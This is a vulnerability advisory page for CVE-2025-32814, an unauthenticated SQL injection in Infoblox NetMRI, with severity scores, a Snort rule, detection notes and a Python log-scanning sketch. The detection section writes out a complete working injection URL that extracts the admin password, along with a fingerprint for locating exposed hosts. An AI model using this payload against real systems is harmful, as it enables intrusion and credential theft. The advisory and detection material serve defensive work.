CVE-2025-32814
published 2025-05-22

CVE-2025-32814: An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.

Priority: P191, critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 36.41% (98.3th percentile)

Affected

1 range
Vendor: infoblox
Product: netmri
Version range: < 7.6.1
Fixed in: 7.6.1

Detection & IOCs (extracted from sources)

url: /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN
path: /netmri/config/userAdmin/login.tdf
other: fofa-query: icon_hash="-319724102"
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2025_32814, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_06_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests use HTTP GET to /netmri/config/userAdmin/login.tdf with the skipjackUsername parameter containing error-based SQL injection via updatexml() and the NetmriDecrypt() function to extract encrypted credentials from the skipjack.ACLUser table.
  • Successful exploitation produces an XPATH syntax error response in the HTTP body containing the extracted credential value between tilde (~) delimiters, matchable with regex: XPATH syntax error: '~(.*?)~'
  • Detection should look for the string 'netmridecrypt' (case-insensitive) in the URI query string following the skipjackUsername parameter, as this is the proprietary decryption function abused in the attack payload.
  • The Snort/ET rule (sid:2062742) targets HTTP GET requests where the URI starts with /netmri/config/userAdmin/login.tdf? and contains both skipjackUsername= and netmridecrypt (case-insensitive). TLS decryption (tls_state TLSDecrypt) is required for encrypted traffic inspection.
  • The attack is unauthenticated (PR:N) and network-reachable (AV:N), so any inbound GET to the login.tdf endpoint with SQL metacharacters in skipjackUsername from an unauthenticated session is suspicious.
  • The Snort rule (sid:2062742) requires TLS decryption to be effective against HTTPS-protected NetMRI deployments, as the attack payload travels in the URI query string.
  • The Nuclei template targets Infoblox NetMRI versions before 7.6.1; the FOFA fingerprint icon_hash=-319724102 can be used to identify exposed instances for proactive scanning.
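
Added example (not part of the sources quoted on this page): a log-review sketch that applies the detection notes above to web access logs, for environments where the network rule cannot see inside TLS. The function names, the combined-log-style line format, the sample lines and the SQL metacharacter list are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

LOGIN_PATH = "/netmri/config/userAdmin/login.tdf"
# Illustrative heuristic for "SQL metacharacters" in a username (assumption).
SQL_META = re.compile(r"""["'()]|--|\b(?:select|updatexml|concat)\b""", re.I)
# Error pattern the page gives for a response that leaked a value.
XPATH_LEAK = re.compile(r"XPATH syntax error: '~(.*?)~'")
# Assumed log layout: client IP first, request line in double quotes.
REQ = re.compile(r'^(\S+) .*?"(\S+) (\S+) HTTP/[\d.]+"')

def classify_request(method, uri):
    """Return 'exploit', 'suspicious' or 'benign' for one request."""
    parts = urlsplit(uri)
    if method != "GET" or parts.path != LOGIN_PATH:
        return "benign"
    # parse_qs percent-decodes the value before it is matched.
    names = parse_qs(parts.query, keep_blank_values=True).get("skipjackUsername", [])
    if any("netmridecrypt" in n.lower() for n in names):
        return "exploit"        # same marker string as sid:2062742
    if any(SQL_META.search(n) for n in names):
        return "suspicious"     # metacharacters in an unauthenticated login
    return "benign"

def response_leaked(body):
    """True if a response body carries the tilde-delimited XPATH error."""
    return XPATH_LEAK.search(body) is not None

def scan(lines):
    """Return (client_ip, verdict) for every non-benign log line."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if m:
            verdict = classify_request(m.group(2), m.group(3))
            if verdict != "benign":
                hits.append((m.group(1), verdict))
    return hits

# Constructed sample lines; the payload is shortened to a placeholder.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jun/2025:10:00:01 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin&skipjackPassword=x&mode=DO-LOGIN HTTP/1.1" 200 512',
    '203.0.113.9 - - [04/Jun/2025:10:00:05 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=x%22+AND+NetmriDecrypt(PLACEHOLDER)--%22&mode=DO-LOGIN HTTP/1.1" 200 734',
    '192.0.2.44 - - [04/Jun/2025:10:00:09 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%27--&mode=DO-LOGIN HTTP/1.1" 200 498',
    '198.51.100.7 - - [04/Jun/2025:10:00:12 +0000] "POST /netmri/other HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

A hit classified as "exploit" on a host running a version before 7.6.1 warrants checking the matching response for the XPATH error and rotating the affected account's credentials.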

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL